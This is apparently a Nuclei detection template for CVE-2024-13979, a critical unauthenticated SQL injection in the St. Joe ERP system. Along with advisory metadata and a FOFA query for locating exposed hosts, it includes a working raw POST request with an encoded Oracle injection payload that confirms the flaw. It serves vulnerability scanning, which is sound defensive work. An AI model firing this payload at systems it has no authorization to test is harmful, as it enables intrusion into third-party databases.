id: CVE-2024-13979

info:
  name: St. Joe ERP system - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    A SQL injection vulnerability exists in the St. Joe ERP system ("圣乔ERP系统") that allows unauthenticated remote attackers to execute arbitrary SQL commands via crafted HTTP POST requests to the login endpoint. The application fails to properly sanitize user-supplied input before incorporating it into SQL queries, enabling direct manipulation of the backend database.
  impact: |
    Successful exploitation may result in unauthorized data access, modification of records, or limited disruption of service. An affected version range is undefined.
  remediation: |
    Update to the latest version of St. Joe ERP system.
  reference:
    - https://github.com/adysec/POC/blob/main/wpoc/%E5%9C%A3%E4%B9%94ERP/%E5%9C%A3%E4%B9%94ERP%E7%B3%BB%E7%BB%9FSingleRowQueryConvertor%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
    - https://www.vulncheck.com/advisories/st-joes-erp-system-sqli
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-13979
    cwe-id: CWE-89
    epss-score: 0.02899
    epss-percentile: 0.85171
    cpe: cpe:2.3:a:st._joe_erp_system_project:st._joe_erp_system:-:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 1
    fofa-query: "圣乔ERP系统"
  tags: cve,cve2024,erp,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /erp/dwr/call/plaincall/SingleRowQueryConvertor.queryForString.dwr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        callCount=1
        page=/erp/dwr/test/SingleRowQueryConvertor
        httpSessionId=
        scriptSessionId=D528B0534A8BE018344AB2D54E02931D86
        c0-scriptName=SingleRowQueryConvertor
        c0-methodName=queryForString
        c0-id=0
        c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(67)||CHR(86)||CHR(69)||CHR(45)||CHR(50)||CHR(48)||CHR(50)||CHR(52)||CHR(45)||CHR(49)||CHR(51)||CHR(57)||CHR(55)||CHR(57)||CHR(62))) FROM DUAL)
        c0-param1=Array:[]
        batchId=0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2024-13979"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008072aaac0a997ee2350b9ee8c4985cdeb96a051841f4c394523bf7f89d0ed4f1022100f4b8abb98d20c76ad5d0345db813c3dab108124ecff7f53a4c90743c505e5271:922c64590222798bb761d5b6d8e72950